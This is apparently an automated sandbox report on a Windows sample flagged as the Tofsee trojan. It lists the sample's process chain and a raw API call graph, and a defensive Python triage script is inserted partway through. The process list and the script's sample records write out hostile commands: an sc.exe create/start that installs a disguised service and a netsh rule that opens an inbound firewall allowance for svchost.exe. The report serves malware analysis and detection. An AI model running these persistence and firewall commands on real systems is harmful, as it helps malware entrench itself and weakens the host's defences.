                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:10
                                                                              Start time:20:04:19
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff745070000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:11
                                                                              Start time:20:04:19
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                              Imagebase:0x7ff651c80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:12
                                                                              Start time:20:04:19
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\SysWOW64\sc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\System32\sc.exe" description htdzdeug "wifi internet conection
                                                                              Imagebase:0xca0000
                                                                              File size:60928 bytes
                                                                              MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:13
                                                                              Start time:20:04:19
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff745070000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:14
                                                                              Start time:20:04:20
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\SgrmBroker.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                              Imagebase:0x7ff6d1310000
                                                                              File size:163336 bytes
                                                                              MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:15
                                                                              Start time:20:04:20
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\SysWOW64\sc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\sc.exe" start htdzdeug
                                                                              Imagebase:0xca0000
                                                                              File size:60928 bytes
                                                                              MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:16
                                                                              Start time:20:04:20
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff745070000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:17
                                                                              Start time:20:04:20
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d"C:\Users\user\Desktop\file.exe"
                                                                              Imagebase:0x400000
                                                                              File size:12343296 bytes
                                                                              MD5 hash:D83D3102AEE8419201BF810DE2A41992
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                                              • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.310684388.00000000005B1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown

                                                                              Target ID:18
                                                                              Start time:20:04:20
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\SysWOW64\netsh.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                              Imagebase:0x10f0000
                                                                              File size:82944 bytes
                                                                              MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:19
                                                                              Start time:20:04:21
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff745070000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:20
                                                                              Start time:20:04:22
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k netsvcs -p
                                                                              Imagebase:0x7ff651c80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:21
                                                                              Start time:20:04:27
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                              Imagebase:0x7ff651c80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:22
                                                                              Start time:20:04:27
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                                                                              Imagebase:0x7ff651c80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:23
                                                                              Start time:20:04:30
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:svchost.exe
                                                                              Imagebase:0xe40000
                                                                              File size:44520 bytes
                                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

                                                                              Target ID:24
                                                                              Start time:20:05:29
                                                                              Start date:07/02/2023
                                                                              Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                              Imagebase:0x7ff6856c0000
                                                                              File size:455656 bytes
                                                                              MD5 hash:A267555174BFA53844371226F482B86B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:25
                                                                              Start time:20:05:29
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff745070000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
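The process list above shows the whole persistence chain in order: sc.exe creates a service (htdzdeug) whose binary lives in a same-named subdirectory of SysWOW64, describes and starts it, the service binary drops a netsh allow rule for svchost.exe under a Windows-sounding rule name, and a 32-bit svchost.exe is then launched with no -k service group, which is the injected process that carries the Tofsee Yara matches. The following is an added triage example, not part of the Joe Sandbox report or of the sample's own code: it runs three heuristic checks over process-creation records and correlates the sc create / sc start / binary launch steps. The records are constructed from the command lines listed above, and the report's Target ID is used as a stand-in for a PID (an assumption; real telemetry would carry the PID and parent PID).

```python
"""Triage checks for sc.exe service persistence, netsh allow rules and bare
svchost.exe launches. Added example, not from the report or the sample."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record. The report's Target ID stands in for a PID."""
    target_id: int
    image: str
    cmdline: str


# Constructed from the report's process list (Target IDs 9, 11, 12, 15, 17, 18, 23).
SAMPLE_EVENTS = [
    ProcEvent(9, r"C:\Windows\SysWOW64\sc.exe",
              r'C:\Windows\System32\sc.exe" create htdzdeug binPath= "C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d\"C:\Users\user\Desktop\file.exe\"" type= own start= auto DisplayName= "wifi support'),
    ProcEvent(11, r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\svchost.exe -k NetworkService -p"),
    ProcEvent(12, r"C:\Windows\SysWOW64\sc.exe",
              r'C:\Windows\System32\sc.exe" description htdzdeug "wifi internet conection'),
    ProcEvent(15, r"C:\Windows\SysWOW64\sc.exe",
              r'"C:\Windows\System32\sc.exe" start htdzdeug'),
    ProcEvent(17, r"C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe",
              r'C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d"C:\Users\user\Desktop\file.exe"'),
    ProcEvent(18, r"C:\Windows\SysWOW64\netsh.exe",
              r'"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul'),
    ProcEvent(23, r"C:\Windows\SysWOW64\svchost.exe", r"svchost.exe"),
]

# "sc create <name> binPath= <exe>": capture the service name and the binary path.
SC_CREATE = re.compile(r'\bcreate\s+(\S+)\s+binpath=\s*"?([^"]*?\.exe)', re.IGNORECASE)
# Windows' own service binaries sit directly in System32/SysWOW64; one nested a
# directory deeper is worth a look. Group 1 is that directory name.
NESTED_SYSTEM_BINARY = re.compile(
    r'^[a-z]:\\windows\\(?:system32|syswow64)\\([^\\]+)\\[^\\]+\.exe$', re.IGNORECASE)


def parse_kv(cmdline):
    """key=value pairs of a netsh advfirewall command; quoted values keep their spaces."""
    return {k.lower(): v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', cmdline)}


def check_sc_create(ev):
    """Service created with a binary nested one directory below System32/SysWOW64."""
    m = SC_CREATE.search(ev.cmdline)
    if not m or not ev.image.lower().endswith("\\sc.exe"):
        return None
    name, binary = m.group(1), m.group(2)
    nested = NESTED_SYSTEM_BINARY.match(binary)
    if not nested:
        return None
    same = " (directory name equals service name)" if nested.group(1).lower() == name.lower() else ""
    return f"service {name!r} installed with nested system-directory binary {binary}{same}"


def check_netsh_allow(ev):
    """Inbound allow rule for svchost.exe: a service host never needs a per-program rule."""
    if not ev.image.lower().endswith("\\netsh.exe"):
        return None
    if not re.search(r"advfirewall\s+firewall\s+add\s+rule", ev.cmdline, re.IGNORECASE):
        return None
    kv = parse_kv(ev.cmdline)
    program = kv.get("program", "").rsplit("\\", 1)[-1].lower()
    if kv.get("action", "").lower() == "allow" and program == "svchost.exe":
        return f"inbound allow rule {kv.get('name')!r} for {kv.get('program')}"
    return None


def check_svchost(ev):
    """svchost.exe is always started by services.exe with '-k <group>'; a bare launch is not."""
    if ev.image.lower().rsplit("\\", 1)[-1] != "svchost.exe":
        return None
    if "-k" not in ev.cmdline.split():
        return f"svchost.exe started without a -k service group ({ev.cmdline!r})"
    return None


def service_chain(events):
    """Correlate 'sc create' with the later 'sc start' and the binary's own launch."""
    created = {}
    for ev in events:
        m = SC_CREATE.search(ev.cmdline)
        if m:
            created[m.group(1).lower()] = {"binary": m.group(2), "started": False, "ran": False}
    for ev in events:
        m = re.search(r"\bstart\s+(\S+)", ev.cmdline, re.IGNORECASE)
        if m and ev.image.lower().endswith("\\sc.exe") and m.group(1).lower() in created:
            created[m.group(1).lower()]["started"] = True
        for info in created.values():
            if ev.image.lower() == info["binary"].lower():
                info["ran"] = True
    return created


def triage(events):
    """Return (target_id, check name, detail) for every record a check fires on."""
    findings = []
    for ev in events:
        for check in (check_sc_create, check_netsh_allow, check_svchost):
            hit = check(ev)
            if hit:
                findings.append((ev.target_id, check.__name__, hit))
    return findings


if __name__ == "__main__":
    for tid, rule, detail in triage(SAMPLE_EVENTS):
        print(f"[{tid}] {rule}: {detail}")
    print(service_chain(SAMPLE_EVENTS))
```

Run against the constructed records the checks fire on Target IDs 9, 18 and 23 only; the legitimate svchost.exe instances started with -k (Target IDs 11, 20, 21, 22 in the report) pass. The svchost check is deliberately narrow: on a real host, pair it with a parent-process condition (services.exe) rather than the command line alone, because the injected instance here was started by the service binary, not by the SCM.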


                                                                                Execution Graph

                                                                                Execution Coverage:3.7%
                                                                                Dynamic/Decrypted Code Coverage:23.6%
                                                                                Signature Coverage:33.2%
                                                                                Total number of Nodes:1034
                                                                                Total number of Limit Nodes:17
                                                                                [Execution graph: the interactive call-graph view (node IDs, addresses and edges) is not reproduced here. API names recoverable from the node labels: a stub in the 0x2080000 region calling GetPEB, SetErrorMode, VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA and TerminateProcess; and, in the 0x400000 image, SetUnhandledExceptionFilter, GetSystemTimeAsFileTime, GetVolumeInformationA, GetTickCount, GetModuleHandleA, GetModuleFileNameA, GetProcAddress, GetCommandLineA, GetDriveTypeA, GetTempPathA, GetEnvironmentVariableA, GetVersionExA, GetSystemInfo, GetCurrentProcess, CharToOemA, CreateFileA, ReadFile, WriteFile, SetFilePointer, GetFileSize, GetFileAttributesExA, GetDiskFreeSpaceA, SetFileAttributesA, DeleteFileA, FindCloseChangeNotification, RegOpenKeyExA, RegQueryValueExA, RegSetValueExA, RegDeleteValueA, RegCloseKey, CreateProcessA, ShellExecuteA, StartServiceCtrlDispatcherA, CreateEventA, CreateThread, WSAStartup, inet_addr, GetProcessHeap, RtlAllocateHeap, wsprintfA, Sleep and ExitProcess.]
15197->15196 15199 408156 RegOpenKeyExA 15197->15199 15203 408244 15198->15203 15199->15196 15200 40816d RegQueryValueExA 15199->15200 15201 4081f7 15200->15201 15202 40818d 15200->15202 15204 40820d RegCloseKey 15201->15204 15206 40ec2e codecvt 4 API calls 15201->15206 15202->15201 15208 40ebcc 4 API calls 15202->15208 15205 40ec2e codecvt 4 API calls 15203->15205 15203->15207 15204->15196 15205->15207 15213 4081dd 15206->15213 15214 405e6c 15207->15214 15209 4081a0 15208->15209 15209->15204 15210 4081aa RegQueryValueExA 15209->15210 15210->15201 15211 4081c4 15210->15211 15212 40ebcc 4 API calls 15211->15212 15212->15213 15213->15204 15765 40ec54 GetSystemTimeAsFileTime GetVolumeInformationA GetTickCount 15214->15765 15216 405e71 15766 40e654 15216->15766 15218 405ec1 15219 403132 15218->15219 15220 40df70 12 API calls 15219->15220 15221 40313b 15220->15221 15222 40c125 15221->15222 15777 40ec54 GetSystemTimeAsFileTime GetVolumeInformationA GetTickCount 15222->15777 15224 40c12d 15225 40e654 13 API calls 15224->15225 15226 40c2bd 15225->15226 15227 40e654 13 API calls 15226->15227 15228 40c2c9 15227->15228 15229 40e654 13 API calls 15228->15229 15230 40a47a 15229->15230 15231 408db1 15230->15231 15232 408dbc 15231->15232 15233 40e654 13 API calls 15232->15233 15234 408dec Sleep 15233->15234 15234->14882 15236 40c92f 15235->15236 15237 40c93c 15236->15237 15778 40c517 15236->15778 15239 40ca2b 15237->15239 15240 40e819 11 API calls 15237->15240 15239->14882 15241 40c96a 15240->15241 15242 40e819 11 API calls 15241->15242 15243 40c97d 15242->15243 15244 40e819 11 API calls 15243->15244 15245 40c990 15244->15245 15246 40c9aa 15245->15246 15247 40ebcc 4 API calls 15245->15247 15246->15239 15795 402684 15246->15795 15247->15246 15252 40ca26 15802 40c8aa 15252->15802 15255 40ca44 15256 40ca4b closesocket 15255->15256 15257 40ca83 15255->15257 15256->15252 15258 40ea84 30 API calls 15257->15258 15259 40caac 15258->15259 15260 40f04e 4 API calls 15259->15260 15261 40cab2 
15260->15261 15262 40ea84 30 API calls 15261->15262 15263 40caca 15262->15263 15264 40ea84 30 API calls 15263->15264 15265 40cad9 15264->15265 15810 40c65c 15265->15810 15268 40cb60 closesocket 15268->15239 15270 40dad2 closesocket 15271 40e318 23 API calls 15270->15271 15271->15239 15272 40df4c 20 API calls 15297 40cb70 15272->15297 15277 40e654 13 API calls 15277->15297 15280 40f04e LoadLibraryA GetProcAddress SystemTimeToFileTime GetSystemTimeAsFileTime 15280->15297 15284 40c65c send GetProcessHeap HeapSize GetProcessHeap RtlAllocateHeap 15284->15297 15285 40ea84 30 API calls 15285->15297 15286 40d815 wsprintfA 15286->15297 15287 40cc1c GetTempPathA 15287->15297 15288 40d569 closesocket Sleep 15857 40e318 15288->15857 15289 407ead 6 API calls 15289->15297 15290 40c517 23 API calls 15290->15297 15292 40e8a1 30 API calls 15292->15297 15293 40d582 ExitProcess 15294 40cfe3 GetSystemDirectoryA 15294->15297 15295 40675c 21 API calls 15295->15297 15296 40d027 GetSystemDirectoryA 15296->15297 15297->15270 15297->15272 15297->15277 15297->15280 15297->15284 15297->15285 15297->15286 15297->15287 15297->15288 15297->15289 15297->15290 15297->15292 15297->15294 15297->15295 15297->15296 15298 40cfad GetEnvironmentVariableA 15297->15298 15299 40d105 lstrcatA 15297->15299 15300 40ef1e lstrlenA 15297->15300 15301 40ec2e GetProcessHeap HeapSize GetProcessHeap HeapFree codecvt 15297->15301 15302 40cc9f CreateFileA 15297->15302 15303 40d15b CreateFileA 15297->15303 15308 40d149 SetFileAttributesA 15297->15308 15310 40d36e GetEnvironmentVariableA 15297->15310 15311 40d1bf SetFileAttributesA 15297->15311 15312 408e26 GetSystemTime SystemTimeToFileTime CreateFileW DeviceIoControl CloseHandle 15297->15312 15314 40d22d GetEnvironmentVariableA 15297->15314 15316 40d3af lstrcatA 15297->15316 15318 407fcf 64 API calls 15297->15318 15319 40d3f2 CreateFileA 15297->15319 15325 40d26e lstrcatA 15297->15325 15327 40d4b1 CreateProcessA 15297->15327 15328 40d3e0 SetFileAttributesA 15297->15328 
15329 40d2b1 CreateFileA 15297->15329 15331 40d452 SetFileAttributesA 15297->15331 15333 407ee6 64 API calls 15297->15333 15334 40d29f SetFileAttributesA 15297->15334 15337 40d31d SetFileAttributesA 15297->15337 15818 40c75d 15297->15818 15830 407e2f 15297->15830 15852 407ead 15297->15852 15862 4031d0 15297->15862 15879 403c09 15297->15879 15889 403a00 15297->15889 15893 40e7b4 15297->15893 15896 40c06c 15297->15896 15902 406f5f GetUserNameA 15297->15902 15913 40e854 15297->15913 15923 407dd6 15297->15923 15298->15297 15299->15297 15300->15297 15301->15297 15302->15297 15304 40ccc6 WriteFile 15302->15304 15303->15297 15305 40d182 WriteFile CloseHandle 15303->15305 15306 40cdcc CloseHandle 15304->15306 15307 40cced CloseHandle 15304->15307 15305->15297 15306->15297 15313 40cd2f 15307->15313 15308->15303 15309 40cd16 wsprintfA 15309->15313 15310->15297 15311->15297 15312->15297 15313->15309 15839 407fcf 15313->15839 15314->15297 15316->15297 15316->15319 15318->15297 15319->15297 15322 40d415 WriteFile CloseHandle 15319->15322 15320 40cd81 WaitForSingleObject CloseHandle CloseHandle 15323 40f04e 4 API calls 15320->15323 15321 40cda5 15324 407ee6 64 API calls 15321->15324 15322->15297 15323->15321 15326 40cdbd DeleteFileA 15324->15326 15325->15297 15325->15329 15326->15297 15327->15297 15330 40d4e8 CloseHandle CloseHandle 15327->15330 15328->15319 15329->15297 15332 40d2d8 WriteFile CloseHandle 15329->15332 15330->15297 15331->15297 15332->15297 15333->15297 15334->15329 15337->15297 15339 40741b 15338->15339 15340 406dc2 6 API calls 15339->15340 15341 40743f 15340->15341 15342 407469 RegOpenKeyExA 15341->15342 15343 4077f9 15342->15343 15353 407487 ___ascii_stricmp 15342->15353 15343->14953 15344 407703 RegEnumKeyA 15345 407714 RegCloseKey 15344->15345 15344->15353 15345->15343 15346 4074d2 RegOpenKeyExA 15346->15353 15347 40772c 15349 407742 RegCloseKey 15347->15349 15350 40774b 15347->15350 15348 407521 RegQueryValueExA 15348->15353 15349->15350 15352 4077ec 
RegCloseKey 15350->15352 15351 4076e4 RegCloseKey 15351->15353 15352->15343 15353->15344 15353->15346 15353->15347 15353->15348 15353->15351 15355 40f1a5 lstrlenA 15353->15355 15356 40777e GetFileAttributesExA 15353->15356 15357 407769 15353->15357 15354 4077e3 RegCloseKey 15354->15352 15355->15353 15356->15357 15357->15354 15359 407073 15358->15359 15360 4070b9 RegOpenKeyExA 15359->15360 15361 4070d0 15360->15361 15375 4071b8 15360->15375 15362 406dc2 6 API calls 15361->15362 15365 4070d5 15362->15365 15363 40719b RegEnumValueA 15364 4071af RegCloseKey 15363->15364 15363->15365 15364->15375 15365->15363 15367 4071d0 15365->15367 15381 40f1a5 lstrlenA 15365->15381 15368 407205 RegCloseKey 15367->15368 15369 407227 15367->15369 15368->15375 15370 4072b8 ___ascii_stricmp 15369->15370 15371 40728e RegCloseKey 15369->15371 15372 4072cd RegCloseKey 15370->15372 15373 4072dd 15370->15373 15371->15375 15372->15375 15374 407311 RegCloseKey 15373->15374 15377 407335 15373->15377 15374->15375 15375->14954 15376 4073d5 RegCloseKey 15378 4073e4 15376->15378 15377->15376 15379 40737e GetFileAttributesExA 15377->15379 15380 407397 15377->15380 15379->15380 15380->15376 15382 40f1c3 15381->15382 15382->15365 15384 403ee2 15383->15384 15385 403edc 15383->15385 15384->14960 15386 406dc2 6 API calls 15385->15386 15386->15384 15388 40400b CreateFileA 15387->15388 15389 40402c GetLastError 15388->15389 15390 404052 15388->15390 15389->15390 15391 404037 15389->15391 15390->14958 15390->14963 15390->14964 15391->15390 15392 404041 Sleep 15391->15392 15392->15388 15392->15390 15394 403f7c 15393->15394 15395 403f4e GetLastError 15393->15395 15397 403f8c ReadFile 15394->15397 15395->15394 15396 403f5b WaitForSingleObject GetOverlappedResult 15395->15396 15396->15394 15398 403ff0 15397->15398 15399 403fc2 GetLastError 15397->15399 15398->14969 15398->14970 15399->15398 15400 403fcf WaitForSingleObject GetOverlappedResult 15399->15400 15400->15398 15404 40eb74 15401->15404 15405 40eb7b 
GetProcessHeap HeapSize 15404->15405 15406 404350 15404->15406 15405->15406 15406->14977 15408 401924 GetVersionExA 15407->15408 15408->15021 15410 406eef AllocateAndInitializeSid 15409->15410 15416 406f55 15409->15416 15411 406f44 15410->15411 15412 406f1c CheckTokenMembership 15410->15412 15411->15416 15443 406e36 GetUserNameW 15411->15443 15413 406f3b FreeSid 15412->15413 15414 406f2e 15412->15414 15413->15411 15414->15413 15416->15030 15418 40920e 15417->15418 15421 409308 15417->15421 15419 4092f1 Sleep 15418->15419 15420 4092bf ShellExecuteA 15418->15420 15418->15421 15419->15418 15420->15418 15420->15421 15421->15048 15423 40ef32 15422->15423 15423->15045 15425 40f0f1 15424->15425 15426 40f0ed 15424->15426 15427 40f119 15425->15427 15428 40f0fa lstrlenA SysAllocStringByteLen 15425->15428 15426->15053 15429 40f11c MultiByteToWideChar 15427->15429 15428->15429 15430 40f117 15428->15430 15429->15430 15430->15053 15432 401820 17 API calls 15431->15432 15433 4018f2 15432->15433 15434 4018f9 15433->15434 15446 401280 15433->15446 15434->15048 15436 401908 15436->15048 15459 401000 15437->15459 15439 401839 15440 401851 GetCurrentProcess 15439->15440 15441 40183d 15439->15441 15442 401864 15440->15442 15441->15039 15442->15039 15444 406e5f LookupAccountNameW 15443->15444 15445 406e97 15443->15445 15444->15445 15445->15416 15449 4012e1 ShellExecuteExW 15446->15449 15448 4016f9 GetLastError 15450 401699 15448->15450 15449->15448 15456 4013a8 15449->15456 15450->15436 15451 401570 lstrlenW 15451->15456 15452 4015be GetStartupInfoW 15452->15456 15453 4015ff CreateProcessWithLogonW 15454 4016bf GetLastError 15453->15454 15455 40163f WaitForSingleObject 15453->15455 15454->15450 15455->15456 15457 401659 CloseHandle 15455->15457 15456->15450 15456->15451 15456->15452 15456->15453 15458 401668 CloseHandle 15456->15458 15457->15456 15458->15456 15460 40100d LoadLibraryA 15459->15460 15476 401023 15459->15476 15461 401021 15460->15461 15460->15476 15461->15439 15462 4010b5 
GetProcAddress 15463 4010d1 GetProcAddress 15462->15463 15464 40127b 15462->15464 15463->15464 15465 4010f0 GetProcAddress 15463->15465 15464->15439 15465->15464 15466 401110 GetProcAddress 15465->15466 15466->15464 15467 401130 GetProcAddress 15466->15467 15467->15464 15468 40114f GetProcAddress 15467->15468 15468->15464 15469 40116f GetProcAddress 15468->15469 15469->15464 15470 40118f GetProcAddress 15469->15470 15470->15464 15471 4011ae GetProcAddress 15470->15471 15471->15464 15472 4011ce GetProcAddress 15471->15472 15472->15464 15473 4011ee GetProcAddress 15472->15473 15473->15464 15474 401209 GetProcAddress 15473->15474 15474->15464 15475 401225 GetProcAddress 15474->15475 15475->15464 15477 401241 GetProcAddress 15475->15477 15476->15462 15479 4010ae 15476->15479 15477->15464 15478 40125c GetProcAddress 15477->15478 15478->15464 15479->15439 15482 4069b9 WriteFile 15480->15482 15483 406a3c 15482->15483 15485 4069ff 15482->15485 15483->15063 15483->15064 15484 406a10 WriteFile 15484->15483 15484->15485 15485->15483 15485->15484 15487 40eb17 15486->15487 15488 40eb21 15486->15488 15490 40eae4 15487->15490 15488->15065 15491 40eb02 GetProcAddress 15490->15491 15492 40eaed LoadLibraryA 15490->15492 15491->15488 15492->15491 15493 40eb01 15492->15493 15493->15488 15495 40eba7 GetProcessHeap HeapSize 15494->15495 15496 40ebbf GetProcessHeap HeapFree 15494->15496 15495->15496 15496->15096 15498 40908d 15497->15498 15499 4090e2 wsprintfA 15498->15499 15500 40ee2a 15499->15500 15501 4090fd CreateFileA 15500->15501 15502 40911a lstrlenA WriteFile CloseHandle 15501->15502 15503 40913f 15501->15503 15502->15503 15503->15105 15503->15106 15505 40ee2a 15504->15505 15506 409794 CreateProcessA 15505->15506 15507 4097c2 15506->15507 15508 4097bb 15506->15508 15509 4097d4 GetThreadContext 15507->15509 15508->15117 15510 409801 15509->15510 15511 4097f5 15509->15511 15518 40637c 15510->15518 15512 4097f6 TerminateProcess 15511->15512 15512->15508 15514 409816 15514->15512 
